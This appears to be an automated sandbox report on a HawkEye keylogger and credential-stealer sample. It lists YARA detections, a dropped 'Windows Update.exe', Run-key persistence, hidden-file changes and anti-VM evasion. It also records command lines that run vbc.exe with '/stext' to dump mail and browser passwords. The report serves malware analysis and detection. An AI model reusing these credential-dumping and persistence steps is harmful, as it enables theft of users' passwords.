                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.2577280.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.46e0000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.46f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.23bfc84.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: Sample_B.exe, Form1.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (3 occurrences)
Source: Sample_B.exe, Form1.cs; Cryptographic APIs: 'CreateDecryptor'
Source: Windows Update.exe.0.dr, Form1.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (3 occurrences)
Source: Windows Update.exe.0.dr, Form1.cs; Cryptographic APIs: 'CreateDecryptor'
Source: Sample_B.exe, Windows Update.exe.0.dr, 0.0.Sample_B.exe.bc0000.0.unpack, 0.2.Sample_B.exe.bc0000.0.unpack, WindowsUpdate.exe.2.dr, 2.2.Windows Update.exe.ee0000.1.unpack, 2.0.Windows Update.exe.ee0000.0.unpack (Form1.cs in each); Base64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 0.2.Sample_B.exe.bc0000.0.unpack, 0.0.Sample_B.exe.bc0000.0.unpack, WindowsUpdate.exe.2.dr, Windows Update.exe.0.dr, 2.2.Windows Update.exe.ee0000.1.unpack, 2.0.Windows Update.exe.ee0000.0.unpack, Sample_B.exe (Form1.cs in each); Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@9/15@6/2
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00644FBA AdjustTokenPrivileges, 2_2_00644FBA
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00644F83 AdjustTokenPrivileges, 2_2_00644F83
Source: C:\Users\user\Desktop\Sample_B.exe; File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\Desktop\Sample_B.exe; File created: C:\Users\user\AppData\Local\Temp\SysInfo.txt
Source: Sample_B.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Sample_B.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Sample_B.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\Sample_B.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\Desktop\Sample_B.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Sample_B.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; File read: C:\Windows\System32\drivers\etc\hosts (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: Sample_B.exe, Windows Update.exe; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Sample_B.exe, Windows Update.exe; Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Windows Update.exe, 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmp; Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Sample_B.exe, Windows Update.exe; Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Sample_B.exe, Windows Update.exe; Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Sample_B.exe, Windows Update.exe; Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Sample_B.exe, Windows Update.exe; Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Sample_B.exe; String found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
Source: C:\Users\user\Desktop\Sample_B.exe; File read: C:\Users\user\Desktop\Sample_B.exe
Source: unknown; Process created: C:\Users\user\Desktop\Sample_B.exe 'C:\Users\user\Desktop\Sample_B.exe'
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
Source: unknown; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708
Source: unknown; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: unknown; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\Sample_B.exe; Process created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe'
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\Sample_B.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Automated click: OK (2 occurrences)
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Sample_B.exe; File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: Sample_B.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\Sample_B.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
Source: Sample_B.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb; source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: pC:\Win.pdbassembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: F^symbols\dll\mscorlib.pdb^; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: .pdb;; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdb; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: ^indows\mscorlib.pdbpdblib.pdb; source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbs\AppData\Roaming\Windows Update.exe; source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb8; source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb; source: Sample_B.exe
Source: Binary string: dows\mC:\Users\user\AppData\Roaming__b77a5c561934e089\mscorlib.pdbne_d08cc06a442b34fc; source: Windows Update.exe, 00000002.00000002.2110645505.00000000003A0000.00000004.00000020.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb; source: Sample_B.exe
Source: Binary string: C:\Windows\dll\mscorlib.pdb; source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb; source: Sample_B.exe
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbFP; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: ^T3/pC:\Windows\mscorlib.pdb4; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdbH; source: Windows Update.exe, 00000002.00000002.2123111856.000000000970A000.00000004.00000010.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb; source: Windows Update.exe, 00000002.00000002.2110851698.00000000005EC000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb; source: Sample_B.exe, 00000000.00000002.2076293431.0000000002050000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2111699782.0000000000E70000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: Sample_B.exe, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Windows Update.exe.0.dr, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: WindowsUpdate.exe.2.dr, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs; .Net Code: IsDotNet, run, stealMail, stealWebroswers each call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\Sample_B.exe; Code function: 0_2_00C30712 push eax; ret 0_2_00C30726
Source: C:\Users\user\Desktop\Sample_B.exe; Code function: 0_2_00C30712 push eax; ret 0_2_00C3074E
Source: C:\Users\user\Desktop\Sample_B.exe; Code function: 0_2_00C0B87E push ecx; ret 0_2_00C0B88E
Source: C:\Users\user\Desktop\Sample_B.exe; Code function: 0_2_00C0BA9D push eax; ret 0_2_00C0BAB1
Source: C:\Users\user\Desktop\Sample_B.exe; Code function: 0_2_00C0BA9D push eax; ret 0_2_00C0BAD9
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00F50712 push eax; ret 2_2_00F50726
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00F50712 push eax; ret 2_2_00F5074E
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00F2B87E push ecx; ret 2_2_00F2B88E
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00F2BA9D push eax; ret 2_2_00F2BAB1
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_00F2BA9D push eax; ret 2_2_00F2BAD9
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_001A7ED2 push eax; ret 2_2_001A7ED5
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 2_2_001A76C5 push esp; retf 2_2_001A76C6
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; File created (dropped file): C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Source: C:\Users\user\Desktop\Sample_B.exe; File created (dropped file): C:\Users\user\AppData\Roaming\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update (2 occurrences)

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in Windows Explorer (hidden files and folders)
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Sample_B.exe; Process information set: NOOPENFILEERRORBOX (44 occurrences)
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Process information set: NOOPENFILEERRORBOX (34 occurrences)
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          Yara detected AntiVM_3
